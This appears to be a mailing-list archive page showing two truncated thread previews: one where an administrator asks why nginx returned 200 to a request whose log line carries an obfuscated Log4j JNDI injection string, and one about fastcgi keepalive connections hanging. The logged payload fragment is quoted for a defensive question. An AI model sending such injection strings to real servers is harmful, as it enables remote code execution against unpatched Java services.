200 html return to log4j exploit

2021-12-19 Thread li...@lazygranch.com
I don't have any service using java so I don't believe I am subject to this exploit. Howerver I am confused why a returned a 200 for this request. The special characters in the URL are confusing. 200 207.244.245.138 - - [17/Dec/2021:02:58:02 +] "GET / HTTP/1.1" 706 "${${lower:jndi}:${lower:rm

keepalive connection to fastcgi backend hangs

2021-12-19 Thread Nicolas Franck
I've created a server setup where nginx acts as a proxy server for a fastcgi application. That last application is running on a different server on port 9000. It is spawn with spawn-fcgi. Recently I have found out that nginx closes the connection after every request. In order to make nginx keep th